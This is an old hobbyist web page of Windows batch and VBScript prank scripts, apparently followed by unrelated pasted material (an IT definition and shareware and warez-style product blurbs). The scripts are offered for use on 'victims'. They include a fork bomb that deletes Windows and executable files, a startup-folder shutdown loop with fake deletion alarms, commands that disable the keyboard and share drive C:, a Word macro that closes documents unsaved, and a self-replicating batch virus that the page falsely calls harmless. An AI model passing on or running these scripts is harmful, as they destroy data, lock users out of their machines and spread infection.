Batch and Vbs codes This page's code contributions have been made by Jay Plaza (jawardz)
The first code we are going to look at is one that makes the cd tray open and close repeatedly until shutdown, or (don't tell your friends, you press ctrl + alt + delete and go to processes, and end wscript.exe (this code is vbs so save in note pad as whateveryouwant.vbs)
Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.cdromCollection if colCDROMs.Count >= 1 then do For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next ' cdrom For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next ' cdrom loop end if
next, we have a code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this turns on and off your capslock every tenth of a second.
Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop
Now we have a batch file that pops up with repeating message boxes
:Begin msg * Hi msg * Are you having fun? msg * I am! msg * Lets have fun together! msg * since you are stuck reading msg * I am gonna tell you a story msg * bout a dumb guy named (victims name) msg * who just opened my batch msg * and got stuck listening to a story msg * from a computer msg * so he was opening up batches msg * when one pops up with a cool msg msg * then it says "hi" msg * Hi msg * Are you having fun? msg * I am! msg * have fun playing with this one (insert victim) msg * Because you have been P-w-n-e-d with a capital "P" GOTO BEGIN
we now have a batch that is like a computer password, maybe you could stick it in autoexec.exe and make it run off startup?
@Echo off echo Enter password then [F6] and then smack the [Enter] key real hard! prompt $e[30m echo on echo off copy con password.dat>nul prompt $e[0m echo on echo off cls copy password.set+password.dat password.bat>nul call password.bat if '%password%==qwerty goto done echo Incorrect, you are not trying to break into my pc are you? choice /t:y,3 if errorlevel 2 goto next :next erase password.bat erase password.dat :hello cls echo Turn off PC goto hello :done erase password.dat erase password.bat set password=qwerty prompt $p$g
now we have a batch that switches the left mouse button with your right mouse button (also maybe add a code to stick in someones autoexec, that would really make them mad)
@echo off Rundll32 user32,SwapMouseButton rundll32 keyboard,disable msg * hahaha msg * this is gunna screw you up msg * good look finding how to fix it
batch file that will shutdown your computer and send a few messages about the matrix, rather bland and could be worked on a little bit more, some one could tweak it a little and i'll repost it and give you credit, perhaps change the dos txt to green
@ Echo off Title Matrix msg * The matrix has you, you can not escape rundll32.exe disable mouse Attrib +h C:*.* echo deleting harddrive echo 1001101010101011111111101010101 echo 010101010101010101010101010111 assoc assoc Attrib C:Documents and settings*.* net share hack=C: shutdown -s -c 60
this is a VBs file so of course save as VBS, you can replace the txt in this code with whatever you want
This is a batch file "Virus" it does not actually do anything. it will just set off your anti virus
@echo off>nul.ViRuS if "%1=="/ViRuS_MULTIPLY goto ViRuS_multiply if "%1=="/ViRuS_OUTER_LOOP goto ViRuS_outer_loop if "%1=="/ViRuS_FINDSELF goto ViRuS_findself if "%VOFF%=="T goto ViRuS_OLDBAT set ViRuSname=%0 if not exist %0.bat call %0 /ViRuS_FINDSELF %path% if not exist %ViRuSname%.bat set ViRuSname= if "%ViRuSname%==" goto ViRuS_OLDBAT rem ViRuS if batch is started with name.BAT, virus will not become active rem ViRuS it was a bug, now it's a feature ! (also notice the voff variable) rem ViRuS also if batch was only in an append /x:on path (chance=minimal) attrib +h %ViRuSname%.bat for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a attrib -h %ViRuSname%.bat set ViRuSname= goto ViRuS_OLDBAT :ViRuS_findself if "%2==" goto XXX_END>nul.ViRuS if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname% if exist %ViRuSname%.bat goto XXX_END if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname% if exist %ViRuSname%.bat goto XXX_END shift>nul.ViRuS goto ViRuS_findself :ViRuS_outer_loop for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a goto XXX_END>nul.ViRuS ViRuS_multiply find "ViRuS" <%ViRuSname%.bat >xViRuSx.bat find /v "ViRuS" <%2 |find /v ":XXX_END" >>xViRuSx.bat echo :XXX_END>>xViRuSx.bat copy xViRuSx.bat %2>nul del xViRuSx.bat goto XXX_END>nul.ViRuS :ViRuS_OLDBAT echo on>nul.ViRuS echo This is the dummy Virus Created Mason(pkk) :XXX_END
this is a VBS code that each time you pree the letter "E", it will close without saving, the reason "E" was chosen is because E is the most common used letter in the english language.
Open MS Word And Press F11, To Open The MS Vbs Editor. Then input this Sub AddKeyBinding() CustomizationContext = NormalTemplate KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyE), KeyCategory:=wdKeyCategoryCommand, _ Command:=”TestKeybinding” End Sub
Sub TestKeybinding() Dim x As Document Set x = ActiveDocument x.Close (False) End Sub
This code is batch and it creates hundreds (or however many you want) of directories
This is a simple Batch example on some of the colors you can change the txt to in dos
@echo off color %num% :start cls COLOR %num% ECHO Green = 1 ECHO Red = 2 ECHO Yellow = 3 ECHO Aqua = 4 ECHO Purple = 5 ECHO White = 6 ECHO Blue = 7 ECHO Gray = 8 ECHO. SET/P color=Enter Color: IF "%color%" equ "1" goto 1 IF "%color%" equ "2" goto 2 IF "%color%" equ "3" goto 3 IF "%color%" equ "4" goto 4 IF "%color%" equ "5" goto 5 IF "%color%" equ "6" goto 6 IF "%color%" equ "7" goto 7 IF "%color%" equ "8" goto 8 IF "%color%" equ "exit" goto end IF "%color%" equ "%color%" goto error :1 set num=a goto start :2 set num=c goto start :3 set num=e goto start :4 set num=B goto start :5 set num=D goto start :6 set num=F goto start :7 set num=9 goto start :8 set num=8 goto start :error cls color 0 ECHO That is not a Valid Color echo. pause goto start
Cool batch file to lock and disguise a folder. Move any files you want to be hidden in your locker, double click the bat again and you will be asked to lock when the folder is locked it will dissapear to unlock the folder double click the bat file enter any pass. or make up one of your own and input it into the code
@ECHO OFF title Folder Locker if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST Locker goto MDLOCKER :CONFIRM echo Are you sure u want to Lock the folder(Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder locked goto End :UNLOCK echo Enter password to Unlock folder set/p "pass=>" if NOT %pass%==type your password here goto FAIL attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker echo Folder Unlocked successfully goto End :FAIL echo Invalid password goto end :MDLOCKER md Locker echo Locker created successfully goto End :End
Batch that kills and deletes the windows directory, and all .txt .exe .bat and .ini files then forkbombs your computer
@echo off kill %windir% del %windir% del *.txt del *.exe del *.bat del *.ini :ok start, cmd Goto ok
Erases hard drive then shuts down the comp:
hdmemory/release echo total hard drive erased echo Do not use on anyone shutdown -r -f -t0
Batch file that each time they reboot, their computer shuts down again in 5 seconds. So you wouldn't want to do this to an unexperienced user, lol
@echo off echo shutdown -s -t 5 -c "Windows is shutting down due to an internal error" > C:\close.bat copy C:\close.bat "C:\documents and settings\all users\start menu\programs\startup\" cls echo Maximize this window to continue echo Wscript.Sleep 4000 > C:\sleep1.vbs call C:\sleep1.vbs echo Msgbox"Critical system process failure. Press enter to to begin auto fix." > c:\error1.vbs call c:\error1.vbs echo Formatting c: drive... echo Wscript.Sleep 2000 > C:\sleep2.vbs call C:\sleep1.vbs echo The following files were are infected and should be deleted immediately call C:\sleep1.vbs dir /s C:\*.exe dir C: call C:\sleep1.vbs cls echo Deleting files 36 percent complete call C:\sleep2.vbs echo Deleting files 79 percent complete call C:\sleep2.vbs echo Deleting files 100 percent complete call C:\sleep2.vbs echo Files successfully deleted call C:\sleep1.vbs cls echo All files in the windows registry were also deleted echo a full reinstall is required to continue using windows call C:\sleep2.vbs echo Msgbox"Windows is not responding, shutting down" > c:\error2.vbs call C:\error2.vbs call C:\sleep2.vbs echo Msgbox"Applications will automatically closed, all unsaved data will be lost" > C:\error3.vbs call C:\error3.vbs cls ECHO ECHO -------------------------------------------------------------------------- call C:\sleep1.vbs shutdown -r -t 5
(INFORMATION TECHNOLOGY) Information technology (IT), as defined by the Information Technology Association of America (ITAA), is "the study, design, development, implementation, support or management of computer-based information systems, particularly software applications and computer hardware." IT deals with the use of electronic computers and computer software to convert, store, protect, process, transmit, and securely retrieve information.
Today, the term information technology has ballooned to encompass many aspects of computing and technology, and the term has become very recognizable. The information technology umbrella can be quite large, covering many fields. IT professionals perform a variety of duties that range from installing applications to designing complex computer networks and information databases. A few of the duties that IT professionals perform may include data management, networking, engineering computer hardware, database and software design, as well as the management and administration of entire systems.
When computer and communications technologies are combined, the result is information technology, or "infotech". Information Technology (IT) is a general term that describes any technology that helps to produce, manipulate, store, communicate, and/or disseminate information. Presumably, when speaking of Information Technology (IT) as a whole, it is noted that the use of computers and information are associated.
The term Information Technology (IT) was coined by Jim Domsic of Michigan in November 1981.[citation needed] Domsic created the term to modernize the outdated phrase "data processing." Domsic at the time worked as a computer manager for an automotive related industry.
In recent years ABET and the ACM have collaborated to form accreditation and curriculum standards for degrees in Information Technology as a distinct field of study separate from both Computer Science and Information Systems. SIGITE is the ACM working group for defining these standards.
Remote Desktop Control displays the screen of another computer (via Internet or
network) on your own screen. The program allows you to use your mouse and keyboard
to control the other computer remotely. It means that you can work on a remote
computer, as if you were sitting in front of it.
Remote Desktop Control is comfortable for any kind of user. Even a "newbie" will
easily understand basic tasks. Gurus will find many powerful features, such as
view only mode or remote system shutdown. The main design consideration of Remote
Desktop Control is "as easy as possible for the user".
Remote Desktop Control is so fast and comfortable that you might even forget that
you are working on a remote computer! The program allows you to work with
different remote computers simultaneously, from anywhere in the world.
Includes various tools : bad sector repair tool, test speed , S.M.A.R.T. information, surface test, check media stability and controller test. Is the hard disk drive monitoring and failure prediction and repairing software for repair and testing. It uses S.M.A.R.T. technology to monitor the health status of hard disk drives, prevents data loss and predicts possible drive fail. This application includes HDDBadSectorRepair.
Do you want to safely encrypt and store all your passwords and be
able to locate and use them in a flash? Password Memory 2008 is
the product your are looking for!
With almost 20 years of experience in the creation of Windows
software, CodeAero Technologies now present a product that should
be used by anyone who want their passwords to themselves. Password
Memory 2008 safely encrypts and manages your passwords and helps
you login to websites in a fast and secure manner. Three different
encryption routines (two 256-bit and one 128-bit) are used to
secure your login information.
When Windows starts up, it automatically launches a certain number of applications. Handy Startup Monitor allows you to manage those applications and help you speed up your windows startup. Also Handy Startup Monitor allows you to monitor the registry & the startUp folders and alerts you whenever any application add or remove itself to/from the Startup hence it can protects you from malicious software that may running at the windows startup.
Benefits:
Manage the startup applications.
Handy Startup Monitor helps you solve problems with programs that automatically run at startup.
Handy Startup Monitor useful when loading new software.
Optimize and improve the system startup time and memory usage.
Protects you from malicious software that may running at the windows startup.
Monitor startup sections for any application add or delete itself from startup.
Features:
Display all the applications running at windows startup .
Allow to add, edit and delete startup programs .
Find the startup applications folder .
Ability to manually run or terminate all of the programs that running at windows startup .
Well designed and user-friendly interface .
Alerts you if any new application add or remove itself from the startup .
Handy Startup Monitor could sort all displayed applications by name or path or Registry section location .
Small file size and low memory-usage .
Support for Windows 98/ME/2000/XP/2003/Vista .
Easy to install and uninstall .
System Requirements
Intel Pentium, Celeron, AMD or compatible processor Windows 98/ME/NT4/2000/XP/2003/Vista
Do you want to know every thing a hacker knows? Like how they do it and how to defend against it. Then you need to learn everything a hacker knows. In my videos you will how to hack your own PC and how to better your own security. The complete "Novice to The Professional" should have these instructional videos now. Dont wait till their gone get them now. You wont find these anywhere, and once you see them youll be glad you down-loaded the series.
Mac OS X Leopard Transformation Pack will transform your Windows XP user interface to Mac OS X Leopard alike looks that everyone will never notice it’s the same old. The installation of Mac OS X Leopard transformation pack that changes some of the windows component and get Mac OS X 10.5 Leopard mods on your XP operating system.
A download manager that will allow you to download files from the internet faster
Download Direct will accelerate your downloads by up to 500% (sometimes more) and will allow you to manage them via one central screen.
All you need is to set some parameters that determine your screensaver’s appearance and behavior in step-by-step mode, seeing the result immediately.
Here are some key features of “Easy 3D Creator”:
• Create stunning 3D screensavers in a few minutes with no programming!
• Wrap the screen saver into installer and generate End-User License Agreement for you automatically!
• You can use a built-in wizard to create a screen saver with your logo or photos with a few mouse clicks!
• Can generate time-limited shareware screen savers!
Aston is a new Desktop and Shell replacement for Windows 9X/ME/NT/2K/XP. It replaces the standard Windows Desktop and provides you with a host of new features, such as Sidebars, clock, weather monitor, animated buttons, transparency effects and much more.Aston also supports Themes, which allow you to change its appearance and functionality according to your mood and needs. No matter what visual style you like: XP, Aqua or something else; you can always download hundreds of Themes, created by professional designers or amateurs from Aston’s homepage or one of numerous other skin sites. Aston features a powerful and user friendly interface, which lets you change your new desktop’s appearance and behavior in few seconds. No need to learn complicated configuration files, everything can be configured in a simple graphical interface. A great balance between performance and appearance allows you to launch Aston even on out of the date PCs or its enjoy many advanced features on more modern computers. Aston is very stable and has a small memory footprint and low CPU usage, so you can free your processor time for other tasks.
Info:
QUOTE
Google Earth Pro-Gold Edition 2008:
Google Earth is a virtual globe program that lets you surf through our entire planet. You can zoom and search for your town and much more things such as school, churches etc! Google Earth Pro Gold is the upgraded version, it has alot of more features such as movie making or advanced printing and much more...
Google Earth Pro Gold combines the power of Google Search with satellite imagery, maps, terrain and 3D buildings to put the world's geographic information at your fingertips. With amazing speed.
* Fly to your house. Just type in an address, press Search, and you�€™ll zoom right in.
* Search for schools, parks, restaurants, and hotels. Get driving directions.
* Tilt and rotate the view to see 3D terrain and buildings, or look up to explore the sky
* Save and share your searches and favorites.
Recently, Google added a feature that allow users to monitor traffic speeds at loops located every 200 yards in real-time.
in version 4.3 released on April 15 2008, Google Street View was fully integrated into the program allowing the program to provide an on the street level view in many locations. Google Earth Pro Gold gives you full advantage of this new tool too.
Get ready for some down-and-dirty hackin'! Over 200 serious hacks readers can use to force Windows XP to do it their way, written in the ExtremeTech no-holds-barred style
* Sinchak doesn't waste time tweaking Movie Maker or Instant Messenger-these hacks are heavy-duty, detailed instructions for squeezing every drop of power from Windows XP and maximizing speed, appearance, and security
* Not for the faint of heart! This book is written for users who aren't afraid to roll up their sleeves, risk voiding their warranties, take total control of the task bar, uninstall programs that are supposedly permanent, and beef up boot speed
* Mines gems like unlocking hidden settings, customizing boot screens, supercharging online and program launch speed, maximizing the file system and RAM, and dumping hated features for good
* Written by the creator of TweakXP.com, a site considered Mecca for Windows hackers and trusted by more than ten million Windows XP users worldwide.
Flash Website Design is the Flash HTML tool to help Web master design animated Flash Web sites, intros, Flash banners, Flash ads. With Flash Website Design you can create your website within 5 minuts and without any skill. The Flash Website Design enables you to create simple as well as complex Flash animations, where by you can combine different fonts and effects within a single Flash animation. Flash Website Design is very user-friendly, wide range effect templates ready for use, and you don't need any Flash/HTML or programming skills to use it. Version 1.0563 supports Flash8 shadow and blur.